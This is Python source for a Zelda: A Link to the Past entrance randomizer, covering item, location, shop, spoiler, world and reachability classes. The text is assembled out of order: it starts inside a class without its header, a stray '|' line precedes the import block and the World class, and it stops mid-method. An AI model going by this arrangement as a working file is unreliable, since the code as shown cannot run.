    def __init__(self, name, enemizer_name, defeat_rule, player):
        self.name = name
        self.enemizer_name = enemizer_name
        self.defeat_rule = defeat_rule
        self.player = player

    def can_defeat(self, state):
        """Evaluate the defeat rule against *state* for this boss's player."""
        return self.defeat_rule(state, self.player)
class Location(object):
    """A spot that can hold one item, guarded by access and item rules."""

    def __init__(self, player, name='', address=None, crystal=False, hint_text=None, parent=None, player_address=None):
        self.name = name
        self.parent_region = parent
        self.item = None
        self.crystal = crystal
        self.address = address
        self.player_address = player_address
        self.spot_type = 'Location'
        self.hint_text = hint_text if hint_text is not None else 'Hyrule'
        self.recursion_count = 0
        self.staleness_count = 0
        self.event = False
        self.locked = False
        # Rule hooks; the rules module replaces these after construction.
        self.always_allow = lambda item, state: False
        self.access_rule = lambda state: True
        self.item_rule = lambda item: True
        self.player = player

    def can_fill(self, state, item, check_access=True):
        """Whether *item* may go here, honouring region/item rules and reachability."""
        if self.always_allow(state, item):
            return True
        if not self.parent_region.can_fill(item):
            return False
        if not self.item_rule(item):
            return False
        return (not check_access) or self.can_reach(state)

    def can_reach(self, state):
        """Reachable when the parent region is reachable and the access rule passes."""
        if not self.parent_region.can_reach(state):
            return False
        if not self.access_rule(state):
            return False
        return True

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        world = self.parent_region.world if self.parent_region and self.parent_region.world else None
        return world.get_name_string_for_object(self) if world else f'{self.name} (Player {self.player})'
class Item(object):
    """A placeable game item plus its credit/hint texts and rom code."""

    def __init__(self, name='', advancement=False, priority=False, type=None, code=None, pedestal_hint=None, pedestal_credit=None, sickkid_credit=None, zora_credit=None, witch_credit=None, fluteboy_credit=None, hint_text=None, player=None):
        self.name = name
        self.advancement = advancement
        self.priority = priority
        self.type = type
        self.pedestal_hint_text = pedestal_hint
        self.pedestal_credit_text = pedestal_credit
        self.sickkid_credit_text = sickkid_credit
        self.zora_credit_text = zora_credit
        self.magicshop_credit_text = witch_credit
        self.fluteboy_credit_text = fluteboy_credit
        self.hint_text = hint_text
        self.code = code
        self.location = None
        self.world = None
        self.player = player

    def _has_type(self, type_name):
        # Shared implementation behind the type-test properties below.
        return self.type == type_name

    @property
    def crystal(self):
        return self._has_type('Crystal')

    @property
    def smallkey(self):
        return self._has_type('SmallKey')

    @property
    def bigkey(self):
        return self._has_type('BigKey')

    @property
    def map(self):
        return self._has_type('Map')

    @property
    def compass(self):
        return self._has_type('Compass')

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
# have 6 address that need to be filled
class Crystal(Item):
    """Marker subclass: a crystal behaves exactly like an Item, but the
    distinct type lets other code single it out via isinstance checks."""
    pass
@unique
class ShopType(Enum):
    """Kind of shop; drives the config bits written by Shop.get_bytes()."""
    Shop = 0
    TakeAny = 1  # sets the 0x80 config bit in get_bytes
    UpgradeShop = 2  # sets the 0x10 (Alt. VRAM) config bit in get_bytes
class Shop(object):
    """A shop attached to a region, holding up to three inventory slots."""

    def __init__(self, region, room_id, type, shopkeeper_config, custom, locked):
        self.region = region
        self.room_id = room_id
        self.type = type
        self.inventory = [None, None, None]
        self.shopkeeper_config = shopkeeper_config
        self.custom = custom
        self.locked = locked

    @property
    def item_count(self):
        """Index of the highest occupied slot plus one (0 when empty)."""
        for slot in (2, 1, 0):
            if self.inventory[slot]:
                return slot + 1
        return 0

    def get_bytes(self):
        # [id][roomID-low][roomID-high][doorID][zero][shop_config][shopkeeper_config][sram_index]
        entrances = self.region.entrances
        config = self.item_count
        if len(entrances) == 1 and entrances[0].name in door_addresses:
            door_id = door_addresses[entrances[0].name][0] + 1
        else:
            door_id = 0
            config |= 0x40  # ignore door id
        if self.type == ShopType.TakeAny:
            config |= 0x80
        if self.type == ShopType.UpgradeShop:
            config |= 0x10  # Alt. VRAM
        return [0x00] + int16_as_bytes(self.room_id) + [door_id, 0x00, config, self.shopkeeper_config, 0x00]

    def has_unlimited(self, item):
        """True when *item* can be bought without limit (directly or as a restock)."""
        for entry in self.inventory:
            if entry is None:
                continue
            if entry['max'] != 0 and entry['replacement'] is not None and entry['replacement'] == item:
                return True
            if entry['item'] is not None and entry['item'] == item:
                return True
        return False

    def clear_inventory(self):
        self.inventory = [None, None, None]

    def add_inventory(self, slot, item, price, max=0, replacement=None, replacement_price=0, create_location=False):
        """Fill *slot* with an inventory record for *item* at *price*."""
        entry = {
            'item': item,
            'price': price,
            'max': max,
            'replacement': replacement,
            'replacement_price': replacement_price,
            'create_location': create_location
        }
        self.inventory[slot] = entry
class Spoiler(object):
    """Collects seed data (placements, entrances, metadata) and renders it as
    JSON or a human-readable text spoiler.

    Fix: the multiworld entrance line in to_file() nested single quotes inside
    a single-quoted f-string, which is a SyntaxError on Python < 3.12 (PEP 701
    relaxed this); the inner expression now uses a double-quoted f-string.
    """

    def __init__(self, world):
        self.world = world
        self.hashes = {}
        self.entrances = OrderedDict()
        self.medallions = {}
        self.playthrough = {}
        self.unreachables = []
        self.startinventory = []
        self.locations = {}
        self.paths = {}
        self.metadata = {}
        self.shops = []
        self.bosses = OrderedDict()

    def set_entrance(self, entrance, exit, direction, player):
        """Record one shuffled entrance pairing; player is omitted in solo seeds."""
        if self.world.players == 1:
            self.entrances[(entrance, direction, player)] = OrderedDict([('entrance', entrance), ('exit', exit), ('direction', direction)])
        else:
            self.entrances[(entrance, direction, player)] = OrderedDict([('player', player), ('entrance', entrance), ('exit', exit), ('direction', direction)])

    def parse_data(self):
        """Snapshot the world's current state into this spoiler's fields."""
        self.medallions = OrderedDict()
        if self.world.players == 1:
            self.medallions['Misery Mire'] = self.world.required_medallions[1][0]
            self.medallions['Turtle Rock'] = self.world.required_medallions[1][1]
        else:
            for player in range(1, self.world.players + 1):
                self.medallions[f'Misery Mire ({self.world.get_player_names(player)})'] = self.world.required_medallions[player][0]
                self.medallions[f'Turtle Rock ({self.world.get_player_names(player)})'] = self.world.required_medallions[player][1]
        self.startinventory = list(map(str, self.world.precollected_items))
        self.locations = OrderedDict()
        listed_locations = set()
        lw_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.LightWorld]
        self.locations['Light World'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in lw_locations])
        listed_locations.update(lw_locations)
        dw_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.DarkWorld]
        self.locations['Dark World'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in dw_locations])
        listed_locations.update(dw_locations)
        cave_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.type == RegionType.Cave]
        self.locations['Caves'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in cave_locations])
        listed_locations.update(cave_locations)
        for dungeon in self.world.dungeons:
            dungeon_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations and loc.parent_region and loc.parent_region.dungeon == dungeon]
            self.locations[str(dungeon)] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in dungeon_locations])
            listed_locations.update(dungeon_locations)
        other_locations = [loc for loc in self.world.get_locations() if loc not in listed_locations]
        if other_locations:
            self.locations['Other Locations'] = OrderedDict([(str(location), str(location.item) if location.item is not None else 'Nothing') for location in other_locations])
            listed_locations.update(other_locations)
        self.shops = []
        for shop in self.world.shops:
            if not shop.custom:
                continue
            shopdata = {'location': str(shop.region),
                        'type': 'Take Any' if shop.type == ShopType.TakeAny else 'Shop'
                        }
            for index, item in enumerate(shop.inventory):
                if item is None:
                    continue
                shopdata['item_{}'.format(index)] = "{} — {}".format(item['item'], item['price']) if item['price'] else item['item']
            self.shops.append(shopdata)
        for player in range(1, self.world.players + 1):
            self.bosses[str(player)] = OrderedDict()
            self.bosses[str(player)]["Eastern Palace"] = self.world.get_dungeon("Eastern Palace", player).boss.name
            self.bosses[str(player)]["Desert Palace"] = self.world.get_dungeon("Desert Palace", player).boss.name
            self.bosses[str(player)]["Tower Of Hera"] = self.world.get_dungeon("Tower of Hera", player).boss.name
            self.bosses[str(player)]["Hyrule Castle"] = "Agahnim"
            self.bosses[str(player)]["Palace Of Darkness"] = self.world.get_dungeon("Palace of Darkness", player).boss.name
            self.bosses[str(player)]["Swamp Palace"] = self.world.get_dungeon("Swamp Palace", player).boss.name
            self.bosses[str(player)]["Skull Woods"] = self.world.get_dungeon("Skull Woods", player).boss.name
            self.bosses[str(player)]["Thieves Town"] = self.world.get_dungeon("Thieves Town", player).boss.name
            self.bosses[str(player)]["Ice Palace"] = self.world.get_dungeon("Ice Palace", player).boss.name
            self.bosses[str(player)]["Misery Mire"] = self.world.get_dungeon("Misery Mire", player).boss.name
            self.bosses[str(player)]["Turtle Rock"] = self.world.get_dungeon("Turtle Rock", player).boss.name
            # Ganon's Tower has three sub-bosses keyed by floor.
            if self.world.mode[player] != 'inverted':
                self.bosses[str(player)]["Ganons Tower Basement"] = self.world.get_dungeon('Ganons Tower', player).bosses['bottom'].name
                self.bosses[str(player)]["Ganons Tower Middle"] = self.world.get_dungeon('Ganons Tower', player).bosses['middle'].name
                self.bosses[str(player)]["Ganons Tower Top"] = self.world.get_dungeon('Ganons Tower', player).bosses['top'].name
            else:
                self.bosses[str(player)]["Ganons Tower Basement"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['bottom'].name
                self.bosses[str(player)]["Ganons Tower Middle"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['middle'].name
                self.bosses[str(player)]["Ganons Tower Top"] = self.world.get_dungeon('Inverted Ganons Tower', player).bosses['top'].name
            self.bosses[str(player)]["Ganons Tower"] = "Agahnim 2"
            self.bosses[str(player)]["Ganon"] = "Ganon"
        if self.world.players == 1:
            self.bosses = self.bosses["1"]
        from Main import __version__ as ERVersion
        self.metadata = {'version': ERVersion,
                         'logic': self.world.logic,
                         'mode': self.world.mode,
                         'retro': self.world.retro,
                         'weapons': self.world.swords,
                         'goal': self.world.goal,
                         'shuffle': self.world.shuffle,
                         'item_pool': self.world.difficulty,
                         'item_functionality': self.world.difficulty_adjustments,
                         'gt_crystals': self.world.crystals_needed_for_gt,
                         'ganon_crystals': self.world.crystals_needed_for_ganon,
                         'open_pyramid': self.world.open_pyramid,
                         'accessibility': self.world.accessibility,
                         'hints': self.world.hints,
                         'mapshuffle': self.world.mapshuffle,
                         'compassshuffle': self.world.compassshuffle,
                         'keyshuffle': self.world.keyshuffle,
                         'bigkeyshuffle': self.world.bigkeyshuffle,
                         'boss_shuffle': self.world.boss_shuffle,
                         'enemy_shuffle': self.world.enemy_shuffle,
                         'enemy_health': self.world.enemy_health,
                         'enemy_damage': self.world.enemy_damage,
                         'beemizer': self.world.beemizer,
                         'progressive': self.world.progressive,
                         'shufflepots': self.world.shufflepots,
                         'players': self.world.players,
                         'teams': self.world.teams
                         }

    def to_json(self):
        """Serialise the spoiler to a JSON string."""
        self.parse_data()
        out = OrderedDict()
        out['Entrances'] = list(self.entrances.values())
        out.update(self.locations)
        out['Starting Inventory'] = self.startinventory
        out['Special'] = self.medallions
        if self.hashes:
            out['Hashes'] = {f"{self.world.player_names[player][team]} (Team {team+1})": hash for (player, team), hash in self.hashes.items()}
        if self.shops:
            out['Shops'] = self.shops
        out['playthrough'] = self.playthrough
        out['paths'] = self.paths
        out['Bosses'] = self.bosses
        out['meta'] = self.metadata
        return json.dumps(out)

    def to_file(self, filename):
        """Write the human-readable text spoiler to *filename*."""
        self.parse_data()
        with open(filename, 'w') as outfile:
            outfile.write('ALttP Entrance Randomizer Version %s - Seed: %s\n\n' % (self.metadata['version'], self.world.seed))
            outfile.write('Filling Algorithm: %s\n' % self.world.algorithm)
            outfile.write('Players: %d\n' % self.world.players)
            outfile.write('Teams: %d\n' % self.world.teams)
            for player in range(1, self.world.players + 1):
                if self.world.players > 1:
                    outfile.write('\nPlayer %d: %s\n' % (player, self.world.get_player_names(player)))
                for team in range(self.world.teams):
                    outfile.write('%s%s\n' % (f"Hash - {self.world.player_names[player][team]} (Team {team+1}): " if self.world.teams > 1 else 'Hash: ', self.hashes[player, team]))
                outfile.write('Logic: %s\n' % self.metadata['logic'][player])
                outfile.write('Mode: %s\n' % self.metadata['mode'][player])
                outfile.write('Retro: %s\n' % ('Yes' if self.metadata['retro'][player] else 'No'))
                outfile.write('Swords: %s\n' % self.metadata['weapons'][player])
                outfile.write('Goal: %s\n' % self.metadata['goal'][player])
                outfile.write('Difficulty: %s\n' % self.metadata['item_pool'][player])
                outfile.write('Item Functionality: %s\n' % self.metadata['item_functionality'][player])
                outfile.write('Item Progression: %s\n' % self.metadata['progressive'][player])
                outfile.write('Entrance Shuffle: %s\n' % self.metadata['shuffle'][player])
                outfile.write('Crystals required for GT: %s\n' % self.metadata['gt_crystals'][player])
                outfile.write('Crystals required for Ganon: %s\n' % self.metadata['ganon_crystals'][player])
                outfile.write('Pyramid hole pre-opened: %s\n' % ('Yes' if self.metadata['open_pyramid'][player] else 'No'))
                outfile.write('Accessibility: %s\n' % self.metadata['accessibility'][player])
                outfile.write('Map shuffle: %s\n' % ('Yes' if self.metadata['mapshuffle'][player] else 'No'))
                outfile.write('Compass shuffle: %s\n' % ('Yes' if self.metadata['compassshuffle'][player] else 'No'))
                outfile.write('Small Key shuffle: %s\n' % ('Yes' if self.metadata['keyshuffle'][player] else 'No'))
                outfile.write('Big Key shuffle: %s\n' % ('Yes' if self.metadata['bigkeyshuffle'][player] else 'No'))
                outfile.write('Boss shuffle: %s\n' % self.metadata['boss_shuffle'][player])
                outfile.write('Enemy shuffle: %s\n' % self.metadata['enemy_shuffle'][player])
                outfile.write('Enemy health: %s\n' % self.metadata['enemy_health'][player])
                outfile.write('Enemy damage: %s\n' % self.metadata['enemy_damage'][player])
                outfile.write('Hints: %s\n' % ('Yes' if self.metadata['hints'][player] else 'No'))
                outfile.write('Beemizer: %s\n' % self.metadata['beemizer'][player])
                outfile.write('Pot shuffle %s\n' % ('Yes' if self.metadata['shufflepots'][player] else 'No'))
            if self.entrances:
                outfile.write('\n\nEntrances:\n\n')
                # Double-quoted inner f-string: nesting the same quote type was a
                # SyntaxError before Python 3.12.
                outfile.write('\n'.join(['%s%s %s %s' % (f"{self.world.get_player_names(entry['player'])}: " if self.world.players > 1 else '', entry['entrance'], '<=>' if entry['direction'] == 'both' else '<=' if entry['direction'] == 'exit' else '=>', entry['exit']) for entry in self.entrances.values()]))
            outfile.write('\n\nMedallions:\n')
            for dungeon, medallion in self.medallions.items():
                outfile.write(f'\n{dungeon}: {medallion}')
            if self.startinventory:
                outfile.write('\n\nStarting Inventory:\n\n')
                outfile.write('\n'.join(self.startinventory))
            outfile.write('\n\nLocations:\n\n')
            outfile.write('\n'.join(['%s: %s' % (location, item) for grouping in self.locations.values() for (location, item) in grouping.items()]))
            outfile.write('\n\nShops:\n\n')
            outfile.write('\n'.join("{} [{}]\n    {}".format(shop['location'], shop['type'], "\n    ".join(item for item in [shop.get('item_0', None), shop.get('item_1', None), shop.get('item_2', None)] if item)) for shop in self.shops))
            outfile.write('\n\nPlaythrough:\n\n')
            outfile.write('\n'.join(['%s: {\n%s\n}' % (sphere_nr, '\n'.join(['  %s: %s' % (location, item) for (location, item) in sphere.items()] if sphere_nr != '0' else [f'  {item}' for item in sphere])) for (sphere_nr, sphere) in self.playthrough.items()]))
            if self.unreachables:
                outfile.write('\n\nUnreachable Items:\n\n')
                outfile.write('\n'.join(['%s: %s' % (unreachable.item, unreachable) for unreachable in self.unreachables]))
            outfile.write('\n\nPaths:\n\n')
            path_listings = []
            for location, path in sorted(self.paths.items()):
                path_lines = []
                for region, exit in path:
                    if exit is not None:
                        path_lines.append("{} -> {}".format(region, exit))
                    else:
                        path_lines.append(region)
                path_listings.append("{}\n        {}".format(location, "\n        => ".join(path_lines)))
            outfile.write('\n'.join(path_listings))
| import copy
from enum import Enum, unique
import logging
import json
from collections import OrderedDict
from collections_extended import bag
from EntranceShuffle import door_addresses
from Utils import int16_as_bytes
class World(object):
    """Container for the complete state of a (multi)world seed.

    Holds per-player option dicts, every region/location/dungeon/shop, the
    item pool, the master CollectionState, and lookup caches used by the
    reachability search. Per-player options are stored as dicts keyed by
    player number (1-based).
    """
    def __init__(self, players, shuffle, logic, mode, swords, difficulty, difficulty_adjustments, timer, progressive, goal, algorithm, accessibility, shuffle_ganon, retro, custom, customitemarray, hints):
        self.players = players
        self.teams = 1
        # Per-player option dicts are copied so callers' dicts are not shared.
        self.shuffle = shuffle.copy()
        self.logic = logic.copy()
        self.mode = mode.copy()
        self.swords = swords.copy()
        self.difficulty = difficulty.copy()
        self.difficulty_adjustments = difficulty_adjustments.copy()
        self.timer = timer
        self.progressive = progressive
        self.goal = goal.copy()
        self.algorithm = algorithm
        self.dungeons = []
        self.regions = []
        self.shops = []
        self.itempool = []
        self.seed = None
        self.precollected_items = []
        # Master collection state; mutated as items are placed/collected.
        self.state = CollectionState(self)
        # Lazily built caches; cleared via clear_entrance_cache/clear_location_cache.
        self._cached_entrances = None
        self._cached_locations = None
        self._entrance_cache = {}
        self._location_cache = {}
        self.required_locations = []
        self.shuffle_bonk_prizes = False
        self.light_world_light_cone = False
        self.dark_world_light_cone = False
        self.clock_mode = 'off'
        self.rupoor_cost = 10
        self.aga_randomness = True
        self.lock_aga_door_in_escape = False
        self.save_and_quit_from_boss = True
        self.accessibility = accessibility.copy()
        self.shuffle_ganon = shuffle_ganon
        self.fix_gtower_exit = self.shuffle_ganon
        self.retro = retro.copy()
        self.custom = custom
        self.customitemarray = customitemarray
        self.can_take_damage = True
        self.hints = hints.copy()
        self.dynamic_regions = []
        self.dynamic_locations = []
        self.spoiler = Spoiler(self)
        self.lamps_needed_for_dark_rooms = 1
        # Seed every per-player attribute dict with its default value.
        for player in range(1, players + 1):
            def set_player_attr(attr, val):
                # Creates self.<attr> as a dict-by-player on first use.
                self.__dict__.setdefault(attr, {})[player] = val
            set_player_attr('_region_cache', {})
            set_player_attr('player_names', [])
            set_player_attr('remote_items', False)
            set_player_attr('required_medallions', ['Ether', 'Quake'])
            set_player_attr('swamp_patch_required', False)
            set_player_attr('powder_patch_required', False)
            set_player_attr('ganon_at_pyramid', True)
            set_player_attr('ganonstower_vanilla', True)
            set_player_attr('sewer_light_cone', self.mode[player] == 'standard')
            set_player_attr('fix_trock_doors', self.shuffle[player] != 'vanilla' or self.mode[player] == 'inverted')
            set_player_attr('fix_skullwoods_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
            set_player_attr('fix_palaceofdarkness_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
            set_player_attr('fix_trock_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
            set_player_attr('can_access_trock_eyebridge', None)
            set_player_attr('can_access_trock_front', None)
            set_player_attr('can_access_trock_big_chest', None)
            set_player_attr('can_access_trock_middle', None)
            set_player_attr('fix_fake_world', True)
            set_player_attr('mapshuffle', False)
            set_player_attr('compassshuffle', False)
            set_player_attr('keyshuffle', False)
            set_player_attr('bigkeyshuffle', False)
            set_player_attr('difficulty_requirements', None)
            set_player_attr('boss_shuffle', 'none')
            set_player_attr('enemy_shuffle', 'none')
            set_player_attr('enemy_health', 'default')
            set_player_attr('enemy_damage', 'default')
            set_player_attr('beemizer', 0)
            set_player_attr('progressive', 'on')
            set_player_attr('escape_assist', [])
            set_player_attr('crystals_needed_for_ganon', 7)
            set_player_attr('crystals_needed_for_gt', 7)
            set_player_attr('open_pyramid', False)
            set_player_attr('treasure_hunt_icon', 'Triforce Piece')
            set_player_attr('treasure_hunt_count', 0)
    def get_name_string_for_object(self, obj):
        """Display name for *obj*; annotated with player names in multiworld."""
        return obj.name if self.players == 1 else f'{obj.name} ({self.get_player_names(obj.player)})'
    def get_player_names(self, player):
        """Comma-joined, order-preserving de-duplication of a player's names."""
        return ", ".join([name for i, name in enumerate(self.player_names[player]) if self.player_names[player].index(name) == i])
    def initialize_regions(self, regions=None):
        """Bind regions to this world and index them in the per-player cache."""
        for region in regions if regions else self.regions:
            region.world = self
            self._region_cache[region.player][region.name] = region
    def get_regions(self, player=None):
        """All regions, or the cached regions of one player."""
        return self.regions if player is None else self._region_cache[player].values()
    def get_region(self, regionname, player):
        """Resolve a region by name (or pass a Region through unchanged)."""
        if isinstance(regionname, Region):
            return regionname
        try:
            return self._region_cache[player][regionname]
        except KeyError:
            # Cache miss: linear fallback, only valid before initialize_regions.
            for region in self.regions:
                if region.name == regionname and region.player == player:
                    assert not region.world # this should only happen before initialization
                    return region
            raise RuntimeError('No such region %s for player %d' % (regionname, player))
    def get_entrance(self, entrance, player):
        """Resolve an entrance by name, memoizing the linear search result."""
        if isinstance(entrance, Entrance):
            return entrance
        try:
            return self._entrance_cache[(entrance, player)]
        except KeyError:
            for region in self.regions:
                for exit in region.exits:
                    if exit.name == entrance and exit.player == player:
                        self._entrance_cache[(entrance, player)] = exit
                        return exit
            raise RuntimeError('No such entrance %s for player %d' % (entrance, player))
    def get_location(self, location, player):
        """Resolve a location by name, memoizing the linear search result."""
        if isinstance(location, Location):
            return location
        try:
            return self._location_cache[(location, player)]
        except KeyError:
            for region in self.regions:
                for r_location in region.locations:
                    if r_location.name == location and r_location.player == player:
                        self._location_cache[(location, player)] = r_location
                        return r_location
        raise RuntimeError('No such location %s for player %d' % (location, player))
    def get_dungeon(self, dungeonname, player):
        """Resolve a dungeon by name (or pass a Dungeon through unchanged)."""
        if isinstance(dungeonname, Dungeon):
            return dungeonname
        for dungeon in self.dungeons:
            if dungeon.name == dungeonname and dungeon.player == player:
                return dungeon
        raise RuntimeError('No such dungeon %s for player %d' % (dungeonname, player))
    def get_all_state(self, keys=False):
        """Build a CollectionState as if the whole item pool were collected.

        Progressive items are resolved to their highest tier allowed by the
        per-player difficulty requirements. With keys=True, a full complement
        of dungeon small/big keys is collected as well.
        """
        ret = CollectionState(self)
        def soft_collect(item):
            # Mirrors CollectionState.collect's progressive-item laddering,
            # but writes into `ret` without triggering event sweeps per item.
            if item.name.startswith('Progressive '):
                if 'Sword' in item.name:
                    if ret.has('Golden Sword', item.player):
                        pass
                    elif ret.has('Tempered Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 4:
                        ret.prog_items.add(('Golden Sword', item.player))
                    elif ret.has('Master Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 3:
                        ret.prog_items.add(('Tempered Sword', item.player))
                    elif ret.has('Fighter Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 2:
                        ret.prog_items.add(('Master Sword', item.player))
                    elif self.difficulty_requirements[item.player].progressive_sword_limit >= 1:
                        ret.prog_items.add(('Fighter Sword', item.player))
                elif 'Glove' in item.name:
                    if ret.has('Titans Mitts', item.player):
                        pass
                    elif ret.has('Power Glove', item.player):
                        ret.prog_items.add(('Titans Mitts', item.player))
                    else:
                        ret.prog_items.add(('Power Glove', item.player))
                elif 'Shield' in item.name:
                    if ret.has('Mirror Shield', item.player):
                        pass
                    elif ret.has('Red Shield', item.player) and self.difficulty_requirements[item.player].progressive_shield_limit >= 3:
                        ret.prog_items.add(('Mirror Shield', item.player))
                    elif ret.has('Blue Shield', item.player) and self.difficulty_requirements[item.player].progressive_shield_limit >= 2:
                        ret.prog_items.add(('Red Shield', item.player))
                    elif self.difficulty_requirements[item.player].progressive_shield_limit >= 1:
                        ret.prog_items.add(('Blue Shield', item.player))
                elif 'Bow' in item.name:
                    if ret.has('Silver Arrows', item.player):
                        pass
                    elif ret.has('Bow', item.player) and self.difficulty_requirements[item.player].progressive_bow_limit >= 2:
                        ret.prog_items.add(('Silver Arrows', item.player))
                    elif self.difficulty_requirements[item.player].progressive_bow_limit >= 1:
                        ret.prog_items.add(('Bow', item.player))
            elif item.name.startswith('Bottle'):
                if ret.bottle_count(item.player) < self.difficulty_requirements[item.player].progressive_bottle_limit:
                    ret.prog_items.add((item.name, item.player))
            elif item.advancement or item.smallkey or item.bigkey:
                ret.prog_items.add((item.name, item.player))
        for item in self.itempool:
            soft_collect(item)
        if keys:
            for p in range(1, self.players + 1):
                from Items import ItemFactory
                for item in ItemFactory(['Small Key (Escape)', 'Big Key (Eastern Palace)', 'Big Key (Desert Palace)', 'Small Key (Desert Palace)', 'Big Key (Tower of Hera)', 'Small Key (Tower of Hera)', 'Small Key (Agahnims Tower)', 'Small Key (Agahnims Tower)',
                                        'Big Key (Palace of Darkness)'] + ['Small Key (Palace of Darkness)'] * 6 + ['Big Key (Thieves Town)', 'Small Key (Thieves Town)', 'Big Key (Skull Woods)'] + ['Small Key (Skull Woods)'] * 3 + ['Big Key (Swamp Palace)',
                                        'Small Key (Swamp Palace)', 'Big Key (Ice Palace)'] + ['Small Key (Ice Palace)'] * 2 + ['Big Key (Misery Mire)', 'Big Key (Turtle Rock)', 'Big Key (Ganons Tower)'] + ['Small Key (Misery Mire)'] * 3 + ['Small Key (Turtle Rock)'] * 4 + ['Small Key (Ganons Tower)'] * 4,
                                       p):
                    soft_collect(item)
        ret.sweep_for_events()
        return ret
    def get_items(self):
        """All items: those already placed at locations plus the unplaced pool."""
        return [loc.item for loc in self.get_filled_locations()] + self.itempool
    def find_items(self, item, player):
        """Locations currently holding the named item for the given player."""
        return [location for location in self.get_locations() if location.item is not None and location.item.name == item and location.item.player == player]
    def push_precollected(self, item):
        """Register a starting-inventory item and collect it into the state."""
        item.world = self
        # Shuffled dungeon keys count as advancement for logic purposes.
        if (item.smallkey and self.keyshuffle[item.player]) or (item.bigkey and self.bigkeyshuffle[item.player]):
            item.advancement = True
        self.precollected_items.append(item)
        self.state.collect(item, True)
    def push_item(self, location, item, collect=True):
        """Place *item* at *location*, optionally collecting it into the state.

        Raises RuntimeError if the location refuses the item.
        """
        if not isinstance(location, Location):
            raise RuntimeError('Cannot assign item %s to location %s (player %d).' % (item, location, item.player))
        if location.can_fill(self.state, item, False):
            location.item = item
            item.location = location
            item.world = self
            if collect:
                self.state.collect(item, location.event, location)
            logging.getLogger('').debug('Placed %s at %s', item, location)
        else:
            raise RuntimeError('Cannot assign item %s to location %s.' % (item, location))
    def get_entrances(self):
        """All entrances of all regions (cached until clear_entrance_cache)."""
        if self._cached_entrances is None:
            self._cached_entrances = []
            for region in self.regions:
                self._cached_entrances.extend(region.entrances)
        return self._cached_entrances
    def clear_entrance_cache(self):
        self._cached_entrances = None
    def get_locations(self):
        """All locations of all regions (cached until clear_location_cache)."""
        if self._cached_locations is None:
            self._cached_locations = []
            for region in self.regions:
                self._cached_locations.extend(region.locations)
        return self._cached_locations
    def clear_location_cache(self):
        self._cached_locations = None
    def get_unfilled_locations(self, player=None):
        """Locations without an item, optionally limited to one player."""
        return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is None]
    def get_filled_locations(self, player=None):
        """Locations holding an item, optionally limited to one player."""
        return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is not None]
    def get_reachable_locations(self, state=None, player=None):
        """Locations reachable under *state* (defaults to the master state)."""
        if state is None:
            state = self.state
        return [location for location in self.get_locations() if (player is None or location.player == player) and location.can_reach(state)]
    def get_placeable_locations(self, state=None, player=None):
        """Empty locations reachable under *state* (defaults to master state)."""
        if state is None:
            state = self.state
        return [location for location in self.get_locations() if (player is None or location.player == player) and location.item is None and location.can_reach(state)]
    def unlocks_new_location(self, item):
        """True when collecting *item* makes at least one new location reachable."""
        temp_state = self.state.copy()
        temp_state.collect(item, True)
        for location in self.get_unfilled_locations():
            if temp_state.can_reach(location) and not self.state.can_reach(location):
                return True
        return False
    def has_beaten_game(self, state, player=None):
        """Goal check: Triforce for one player, or for all when player is None."""
        if player:
            return state.has('Triforce', player)
        else:
            return all((self.has_beaten_game(state, p) for p in range(1, self.players + 1)))
    def can_beat_game(self, starting_state=None):
        """Whether the seed is completable via sphere-by-sphere collection."""
        if starting_state:
            state = starting_state.copy()
        else:
            state = CollectionState(self)
        if self.has_beaten_game(state):
            return True
        prog_locations = [location for location in self.get_locations() if location.item is not None and (location.item.advancement or location.event) and location not in state.locations_checked]
        while prog_locations:
            sphere = []
            # build up spheres of collection radius. Everything in each sphere is independent from each other in dependencies and only depends on lower spheres
            for location in prog_locations:
                if location.can_reach(state):
                    sphere.append(location)
            if not sphere:
                # ran out of places and did not finish yet, quit
                return False
            for location in sphere:
                prog_locations.remove(location)
                state.collect(location.item, True, location)
            if self.has_beaten_game(state):
                return True
        return False
class CollectionState(object):
    """A snapshot of collected progression items and region reachability.

    prog_items is a multiset of (item_name, player) pairs; reachable_regions
    is rebuilt lazily per player whenever `stale` is flagged.
    """
    def __init__(self, parent):
        self.prog_items = bag()
        self.world = parent
        self.reachable_regions = {player: set() for player in range(1, parent.players + 1)}
        self.events = []
        # Maps spot -> (name, predecessor-entry) used for spoiler path output.
        self.path = {}
        self.locations_checked = set()
        self.stale = {player: True for player in range(1, parent.players + 1)}
        for item in parent.precollected_items:
            self.collect(item, True)
    def update_reachable_regions(self, player):
        """Fixed-point expansion of the player's reachable-region set."""
        player_regions = self.world.get_regions(player)
        self.stale[player] = False
        rrp = self.reachable_regions[player]
        new_regions = True
        reachable_regions_count = len(rrp)
        while new_regions:
            player_regions = [region for region in player_regions if region not in rrp]
            for candidate in player_regions:
                if candidate.can_reach_private(self):
                    rrp.add(candidate)
            new_regions = len(rrp) > reachable_regions_count
            reachable_regions_count = len(rrp)
    def copy(self):
        """Deep-enough copy: containers are duplicated, members are shared."""
        ret = CollectionState(self.world)
        ret.prog_items = self.prog_items.copy()
        ret.reachable_regions = {player: copy.copy(self.reachable_regions[player]) for player in range(1, self.world.players + 1)}
